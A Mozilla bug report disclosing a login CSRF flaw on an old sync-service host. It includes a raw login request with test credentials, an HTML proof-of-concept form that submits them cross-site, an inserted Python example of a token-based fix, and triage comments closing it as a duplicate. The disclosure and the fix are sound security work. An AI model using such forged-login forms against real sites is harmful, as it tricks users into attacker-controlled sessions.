Closed Bug 1116791 Opened 9 years ago Closed 9 years ago

CSRF vulnerability in accounts.services.mozilla.com

Categories

(mozilla.org Graveyard :: Server Operations, task)

x86_64
Linux
task
Not set
normal

Tracking

(Not tracked)

RESOLVED DUPLICATE of bug 772818

People

(Reporter: lalithr95, Unassigned)

Details

User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0
Build ID: 20140410211200

Steps to reproduce:

CSRF vulnerability in Mozilla

URL: https://63.245.217.128/

The login request does not have valid protection against CSRF attacks.
Here is the request:

POST / HTTP/1.1
Host: 63.245.217.128
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://63.245.217.128/
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 52

username=abhijeth0423%40gmail.com&password=testadmin

CSRF PoC:
<html>
  <body>
    <form action="https://63.245.217.128/" method="POST">
      <input type="hidden" name="username" value="abhijeth0423&#64;gmail&#46;com" />
      <input type="hidden" name="password" value="testadmin" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Actual results:

Using the above vulnerability, an attacker can make the victim log in to some test account and then observe the changes or actions made by the victim. This is prevented by using either an authentication token or a CSRF token.


Expected results:

The login form needs to be protected with an authentication token as one of the parameters in the login form. This will prevent the CSRF vulnerability.
Assignee: nobody → server-ops
Component: General → Server Operations
Product: Core → mozilla.org
QA Contact: shyam
Version: 28 Branch → other
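The token-based fix the report asks for, shown as an added example (this is not code from the report, nor from the Mozilla service): a login endpoint that issues an anonymous pre-login cookie, renders a token bound to that cookie into the form, and verifies the token before it even looks at the credentials. The server secret, the demo credentials, the `csrf_token` field name and the (status, message) return shape are assumptions made for the example; the two forged requests mirror the PoC above, a cross-site auto-submitted form carrying only `username` and `password`.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple
from urllib.parse import parse_qs

# Assumption: a per-deployment secret held only by the server (generated at
# import time for this demo; real code would load it from configuration).
SERVER_SECRET = secrets.token_bytes(32)

# Constructed demo credentials standing in for the real credential check.
DEMO_USER = "user@example.com"
DEMO_PASSWORD = "s3cret"


def new_pre_session_id() -> str:
    """Random id set in a cookie when the (still anonymous) login page is served."""
    return secrets.token_urlsafe(32)


def make_csrf_token(pre_session_id: str) -> str:
    """Token bound to the pre-login cookie via HMAC, so no server-side table is needed.

    A cross-site page can make the victim's browser *send* the cookie, but can
    neither read the cookie nor the token rendered into the form, so it cannot
    produce a matching pair.
    """
    return hmac.new(SERVER_SECRET, pre_session_id.encode(), hashlib.sha256).hexdigest()


def render_login_form(pre_session_id: str) -> str:
    """Login form as served to the browser that holds pre_session_id in its cookie."""
    token = make_csrf_token(pre_session_id)
    return (
        '<form action="/" method="POST">\n'
        f'  <input type="hidden" name="csrf_token" value="{token}" />\n'
        '  <input type="text" name="username" />\n'
        '  <input type="password" name="password" />\n'
        '  <input type="submit" value="Log in" />\n'
        "</form>"
    )


def handle_login(cookie_pre_session_id: Optional[str], body: str) -> Tuple[int, str]:
    """Server side of POST /: verify the token first, then the credentials.

    Returns an (HTTP status, message) pair. Because the token check comes first,
    a forged request is refused even when it carries valid credentials.
    """
    if not cookie_pre_session_id:
        return 403, "missing pre-session cookie"
    fields: Dict[str, str] = {
        k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()
    }
    expected = make_csrf_token(cookie_pre_session_id)
    # Constant-time compare; a missing field compares as "" and fails.
    if not hmac.compare_digest(fields.get("csrf_token", "").encode(), expected.encode()):
        return 403, "CSRF token mismatch"
    if fields.get("username") == DEMO_USER and fields.get("password") == DEMO_PASSWORD:
        return 200, "logged in"
    return 401, "bad credentials"


def demo() -> Dict[str, Tuple[int, str]]:
    """A legitimate login next to the two ways an attacker's page could try to force one."""
    victim_sid = new_pre_session_id()    # cookie already sitting in the victim's browser
    attacker_sid = new_pre_session_id()  # the attacker's own visit to the login page
    creds = f"username=user%40example.com&password={DEMO_PASSWORD}"
    return {
        # Victim submits the real form: the token came from the page and matches the cookie.
        "legit": handle_login(victim_sid, f"csrf_token={make_csrf_token(victim_sid)}&{creds}"),
        # Auto-submitted form like the PoC: the browser attaches the victim's cookie,
        # but the attacker's page has no way to include a matching token.
        "forged_no_token": handle_login(victim_sid, creds),
        # Attacker copies the token from their *own* login page: it is bound to the
        # attacker's cookie, not the victim's, so it still fails.
        "forged_attacker_token": handle_login(
            victim_sid, f"csrf_token={make_csrf_token(attacker_sid)}&{creds}"
        ),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:>22}: {result}")
```

The HMAC-derived token keeps the server stateless, but it only holds as long as the attacker cannot plant a cookie of their choosing in the victim's browser (for example from a sibling hostname that can set cookies for the parent domain); where that is a concern, store a random token per pre-session server-side instead. Marking the cookie `SameSite=Lax` or `Strict` and rejecting POSTs whose `Origin` header does not match the site are cheap additional layers, but neither replaces the token check shown here.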
Please add the sec-bounty flag!

Regards
As best I can tell this is the old sync service, and signing in with a test account on the web won't do anything in terms of actually syncing anything behaviour-wise. I also see an SSL cert warning if I use the instructions as written, because the IP address doesn't match the cert. Going to https://services.mozilla.com/ doesn't show the same page as ignoring the cert warning. In other words, I'm not sure there's anything to be worried about here.

Richard, can you clarify some more?
Flags: needinfo?(rnewman)
Yeah, that machine is account01.phx.services.mozilla.com, which will be decommissioned soon. And this is a dupe.
Status: UNCONFIRMED → RESOLVED
Closed: 9 years ago
Flags: needinfo?(rnewman)
Resolution: --- → DUPLICATE
Summary: CSRF vulnerability in mozilla subd-domain → CSRF vulnerability in accounts.services.mozilla.com
Product: mozilla.org → mozilla.org Graveyard
Group: core-security